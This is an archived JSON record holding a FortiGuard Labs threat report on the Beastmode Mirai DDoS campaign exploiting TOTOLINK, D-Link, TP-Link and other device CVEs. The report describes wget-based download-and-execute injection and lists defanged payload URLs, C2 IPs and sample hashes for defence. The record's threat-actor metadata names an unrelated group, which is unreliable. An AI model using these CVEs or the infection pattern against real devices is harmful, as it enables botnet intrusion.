{
	"id": "a8085262-2c68-418b-ad00-b313921421a6",
	"created_at": "2026-04-06T01:29:40.506404Z",
	"updated_at": "2026-04-10T03:23:51.251238Z",
	"deleted_at": null,
	"sha1_hash": "7d423bad0fbc1250deea642f18c2ef804fe940c7",
	"title": "Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 73124,
	"plain_text": "Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai\r\nCampaign\r\nBy Joie Salvio and Roy Tay\r\nPublished: 2022-04-01 · Archived: 2026-04-06 01:14:01 UTC\r\nBetween February and March 2022, our FortiGuard Labs team observed that the Beastmode (aka B3astmode)\r\nMirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added\r\nwithin a month, with three targeting various models of TOTOLINK routers.\r\nThis inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit\r\ncodes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted\r\nexploit code within weeks of their release.\r\nBy rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and\r\nexpand their botnets before patches are applied to fix these vulnerabilities.\r\nTOTOLINK has already released updated firmware for affected models and users are strongly encouraged to\r\nupdate their devices.\r\nThis post details how this threat leverages these vulnerabilities to control affected devices, and ways to protect\r\nusers from these attacks.\r\nAffected Platforms: Linux\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: Critical\r\nExploiting New Vulnerabilities\r\nThe Beastmode campaign derives its name from filenames and URLs used for its binary samples (Figure 1), as\r\nwell as a unique HTTP User-Agent header \"b3astmode\" (Figure 2) within the exploit requests. Binary samples are\r\nbased on the publicly available source code of the Mirai botnet.\r\nLike most DDOS botnets, aside from brute-forcing credentials, Beastmode employs a variety of exploits to infect\r\nmore devices, as listed below.\r\nCVE-2022-26210 targets TOTOLINK A800R, A810R, A830R, A950RG, A3000RU, and A3100R (Figure 2).\r\nCVE-2022-25075/25076/25077/25078/25079/25080/25081/25082/25083/25084 are a family of similar\r\nvulnerabilities targeting TOTOLINK A810R, A830R, A860R, A950RG, A3100R, A3600R, T6, and T10 routers.\r\n(Figure 4).\r\nhttps://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign\r\nPage 1 of 5\n\nInterestingly, the samples caught on 20 Feb 2022 contained a typo in the URL, where “downloadFile.cgi” was\r\nused instead of “downloadFlile.cgi” used by the devices. This had been fixed in samples captured three days later,\r\nsuggesting active development and operation of this campaign.\r\nApart from TOTOLINK products, this campaign also targets discontinued D-Link products (DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L and DIR-836L) via CVE-2021-45382      (Figure 5). Note that updated firmware\r\nis not available as these products have reached their end of life/support cycles.\r\nIt is interesting to note that this campaign also attempts to exploit CVE-2021-4045 (Figure 6), a vulnerability for\r\nthe TP-Link Tapo C200 IP camera, which we have not observed in other Mirai-based campaigns. While the\r\ncurrent implementation of the exploit is incorrect, device owners should still update their camera firmware to fix\r\nthis vulnerability.\r\nA couple of older vulnerabilities were also found in the samples analyzed by FortiGuard Labs researchers, namely\r\nCVE-2017-17215 (Figure 7) targeting Huawei HG532 routers, and CVE-2016-5674 (Figure 8) targeting NUUO\r\nNVRmini2, NVRsolo, Crystal Devices, and NETGEAR ReadyNAS Surveillance products.\r\nWhile affecting a variety of products, these vulnerabilities are all similar in that they allow threat actors to inject\r\ncommands to be executed after successful exploitation. This usually involves using the wget command to\r\ndownload shell scripts to infect the device with Beastmode.\r\nIn addition, exploits lead to slightly different shell scripts. Snippets of the scripts downloaded from the successful\r\nexploitation of CVE-2021-45382, CVE-2022-26186, and CVE-2022-25075, respectively are shown below (Figure\r\n9). \r\nAs shown in the above figure, each script downloads the same file to different filenames but is executed with\r\ndifferent parameters.\r\nFor instance, successful exploitation of CVE-2021-45382, a vulnerability involving a function named “DDNS”\r\nwithin D-Link router firmware, leads to the download and execution (Figure 5) of the shell script “ddns.sh”. Then,\r\nas shown in Figure 9, the script then downloads the Beastmode binary, which is saved as “ddns” and executed\r\nwith the “ddns.exploit” parameter. The parameter (highlighted in blue) allows the infected device to register itself\r\nas part of the “ddns.exploit” sub-group within the botnet. It could then be used by the botnet operators to assess\r\nthe viability of specific exploits by measuring the number of bots or simply for ease of management.\r\n Once devices are infected by Beastmode, the botnet can be used by its operators to perform a variety of DDoS\r\nattacks commonly found in other Mirai-based botnets, including:\r\nattack_app_http\r\nattack_tcp_ack\r\nattack_tcp_syn\r\nattack_udp_plain\r\nattack_udp_vse\r\nattack_udp_ovhhex\r\nattack_udp_stdhex\r\nattack_udp_CLAMP\r\nhttps://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign\r\nPage 2 of 5\n\nConclusion\r\nEven though the original Mirai author was arrested in fall 2018, this article highlights how threat actors, such as\r\nthose behind the Beastmode campaign, continue to rapidly incorporate newly published exploit code to infect\r\nunpatched devices using the Mirai malware.\r\nBy continuously monitoring the evolving threat landscape, FortiGuard Labs researchers identify new\r\nvulnerabilities exploited by Mirai variants and malware targeting IoT devices to bring greater awareness to such\r\nthreats and better secure our customers’ networks.\r\nFortinet Protections\r\nFortinet customers are protected by the following:\r\nThe following generic FortiGuard IPS signatures detect exploitation attempts from Beastmode and other\r\nMirai-based botnets:\r\nMirai.Botnet\r\nHTTP.Unix.Shell.IFS.Remote.Code.Execution\r\nFortiGuard Labs also provides IPS signatures against the following vulnerabilities.\r\nCVE-2017-17215 - Huawei.HG532.Remote.Code.Execution\r\nCVE-2016-5674 - NUUO.Surveillance.Application.UNAUTH.Remote.Code.Execution\r\nThe FortiGuard Web Filtering Service blocks downloaded URLs and identified C2s.\r\nThe FortiGuard AntiVirus service detects and blocks this threat as Linux/Mirai and ELF/Mirai\r\nFortiGuard IP Reputation \u0026 Anti-Botnet Security Service proactively blocks these attacks by aggregating\r\nmalicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative\r\ncompetitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile\r\nsources.\r\nIOCs\r\nDownload URLs\r\nhttp://195.133.18[.]119/beastmode/b3astmode.86_64\r\nhttp://195.133.18[.]119/beastmode/b3astmode.arm4\r\nhttp://195.133.18[.]119/beastmode/b3astmode.arm5\r\nhttp://195.133.18[.]119/beastmode/b3astmode.arm6\r\nhttp://195.133.18[.]119/beastmode/b3astmode.arm7\r\nhttp://195.133.18[.]119/beastmode/b3astmode.m68k\r\nhttp://195.133.18[.]119/beastmode/b3astmode.mips\r\nhttps://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign\r\nPage 3 of 5\n\nhttp://195.133.18[.]119/beastmode/b3astmode.mpsl\r\nhttp://195.133.18[.]119/beastmode/b3astmode.ppc\r\nhttp://195.133.18[.]119/beastmode/b3astmode.sh4\r\nhttp://195.133.18[.]119/beastmode/b3astmode.x86\r\nC2 IPs\r\n195.133.18[.]119\r\n136.144.41[.]69\r\nSamples (SHA256)\r\n04a50c409a30cdd53036c490534ee7859b828f2b9a9dd779c6b0112b88b74708\r\n0ca74024f5b389fcfa5ee545c8a7842316c78fc53d4a9e94c34d556459a58877\r\n0d442f4327ddd254dbb2a9a243d9317313e44d4f6a6078ea1139ddd945c3f272\r\n14726d501dd489e8228af9580b4369819efb3101f6128df1a1ab0fcc8d96e797\r\n18cefe4333f5f1165c1275c956c8ae717d53818b2c5b2372144fb87d6687f0d8\r\n36a85f2704f77d7e11976541f3d77774109461e1baae984beb83064c2e34239a\r\n3d0a119b68044b841128e451d80ee41d8be9cc61f9ff9a01c3db7d3271e15655\r\n5adfd18422a37a40e6c7626b27d425a4c5a6ca45ecbc8becd690b8533d9d6c7c\r\n635569c7612278d730cb87879843de03d1ea0df4e1c70262ab50659780eace3b\r\n676b2aa6839606d49bbd2f29487e4c218e7d14dd1a9b870edcabdd11fcab9cf7\r\n9c88fa218af7fb72188a0262b3a29008fedcf3d434b90e8fa578ac8f250f5025\r\na21aa45045c0d4b0d785891b8be57496d62bc2396d01c24a34b40f3e2227ef07\r\na5cbe89bf1f3121eb2012e3c5bb5c237c613b8b615384be0f1cc92817a2f1efe\r\na6a7e46bd0e9ec67a1adec64af8fddee18ce019f731ee9cbf8341b35b2519dd9\r\nb573f4d58b1fe6309b90611dd1d1030d7a3d1eb8ddb18de6dc58eefa876820fd\r\nbe3248d97653e8f97cb8f69af260f03b19965489478211a5565b786e9f5d3c02\r\nca8980cb3bd286e41950d78555fd070eaf2d3bebf2751cb0d12a3eff0a41f829\r\ncd48523a6dced4054cce051d4dd8c06268cee375e56afbf59d724faa91c3e766\r\nhttps://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign\r\nPage 4 of 5\n\nd799ae8a017e76d22f1f35f271ebae9168b7712dce0ce86753edabd6e5f4f0d6\r\nded30dbc39e310ebbc17a9667a14e7f0f2e08999bfc5ebd4eae5c1840b82860a\r\ne7db388460d4e1f8d740018e6012af0ad785d3876a35c924db1f4982d7902db3\r\ne85c3d3ed49d44b1ec3af89d730e129d68a32212e911e6431f405e201597f6ed\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard\r\nSecurity Subscriptions and Services portfolio.\r\nSource: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign\r\nhttps://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign"
	],
	"report_names": [
		"totolink-vulnerabilities-beastmode-mirai-campaign"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775438980,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7d423bad0fbc1250deea642f18c2ef804fe940c7.pdf",
		"text": "https://archive.orkl.eu/7d423bad0fbc1250deea642f18c2ef804fe940c7.txt",
		"img": "https://archive.orkl.eu/7d423bad0fbc1250deea642f18c2ef804fe940c7.jpg"
	}
}